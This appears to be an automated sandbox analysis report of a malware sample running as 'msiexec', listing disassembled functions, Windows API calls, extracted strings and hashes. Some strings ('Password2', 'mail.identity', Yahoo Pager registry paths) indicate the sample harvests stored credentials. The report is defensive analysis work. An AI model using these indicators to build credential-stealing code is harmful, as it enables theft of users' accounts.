                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassName_strcmpimemset
                                                                                        • String ID: edit
                                                                                        • API String ID: 275601554-2167791130
                                                                                        • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                        • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                        • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                        • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                        Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen$_mbscat
                                                                                        • String ID: 3CD
                                                                                        • API String ID: 3951308622-1938365332
                                                                                        • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                        • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                        • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                        • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                        Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbscat$_mbscpy
                                                                                        • String ID: Password2
                                                                                        • API String ID: 2600922555-1856559283
                                                                                        • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                        • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                        • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                        • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                        Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: rows deleted
                                                                                        • API String ID: 2221118986-571615504
                                                                                        • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                        • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                        • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                        • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                        Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                        • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BCA4
                                                                                        • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041BCEC
                                                                                        • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memcmp
                                                                                        • String ID:
                                                                                        • API String ID: 3384217055-0
                                                                                        • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                        • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                        • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                        • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                        Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$memset
                                                                                        • String ID:
                                                                                        • API String ID: 1860491036-0
                                                                                        • Opcode ID: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                        • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                        • Opcode Fuzzy Hash: fb665ac2fefbd88b77538ab471de92cac26eee1f38b4faef847c6b5bb8c147a3
                                                                                        • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                        Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004048C2
                                                                                        • memset.MSVCRT ref: 004048D6
                                                                                        • memset.MSVCRT ref: 004048EA
                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                        • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 368790112-0
                                                                                        • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                        • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                        • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                        • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                        Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040D2C2
                                                                                        • memset.MSVCRT ref: 0040D2D8
                                                                                        • memset.MSVCRT ref: 0040D2EA
                                                                                        • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                        • memset.MSVCRT ref: 0040D319
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 368790112-0
                                                                                        • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                        • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                        • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                        • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                        Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __allrem.LIBCMT ref: 00425850
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                        • __allrem.LIBCMT ref: 00425933
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1992179935-0
                                                                                        • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                        • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                        • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                        • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                        Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        • too many SQL variables, xrefs: 0042C6FD
                                                                                        • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset
                                                                                        • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                        • API String ID: 2221118986-515162456
                                                                                        • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                        • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                        • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                        • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                        Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                        • memset.MSVCRT ref: 004026AD
                                                                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                          • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                          • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                          • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                        • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                        • String ID:
                                                                                        • API String ID: 3503910906-0
                                                                                        • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                        • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                        • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                        • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                        Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040C922
                                                                                        • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                        • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                        • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$MenuPostSendStringmemset
                                                                                        • String ID:
                                                                                        • API String ID: 3798638045-0
                                                                                        • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                        • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                        • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                        • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                        Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                                          • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                        • strlen.MSVCRT ref: 0040B60B
                                                                                        • atoi.MSVCRT(?), ref: 0040B619
                                                                                        • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                        • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                        • String ID:
                                                                                        • API String ID: 4107816708-0
                                                                                        • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                        • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                        • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                        • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                        Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                        • _gmtime64.MSVCRT ref: 00411437
                                                                                        • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                        • strftime.MSVCRT ref: 00411476
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                        • String ID:
                                                                                        • API String ID: 1886415126-0
                                                                                        • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                        • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                        • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                        • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                        Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: strlen
                                                                                        • String ID: >$>$>
                                                                                        • API String ID: 39653677-3911187716
                                                                                        • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                        • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                        • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                        • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                        Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                        • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                        • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3510742995-2766056989
                                                                                        • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                        • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                        • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                        • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                        Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: _strcmpi
                                                                                        • String ID: C@$mail.identity
                                                                                        • API String ID: 1439213657-721921413
                                                                                        • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                        • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                        • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                        • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                        Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                        • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                        • String ID:
                                                                                        • API String ID: 3473537107-0
                                                                                        • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                        • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                        • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                        • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                        Function 00444551 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00444573
                                                                                          • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValuememset
                                                                                        • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                        • API String ID: 3363972335-1703613266
                                                                                        • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                        • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                        • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                        • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                        Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00406640
                                                                                          • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                          • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                        • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                        • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$memset$memcmp
                                                                                        • String ID: Ul@
                                                                                        • API String ID: 270934217-715280498
                                                                                        • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                        • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                        • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                        • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                        Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                          • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                        • sprintf.MSVCRT ref: 0040B929
                                                                                        • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                          • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                          • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                        • sprintf.MSVCRT ref: 0040B953
                                                                                        • _mbscat.MSVCRT ref: 0040B966
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000D.00000002.2628185035.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                        • String ID:
                                                                                        • API String ID: 203655857-0
                                                                                        • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                        • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                        • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                        • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                        Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004176F4: memcmp.MSVCRT(?,0044F118,00000008), ref: 004177B6
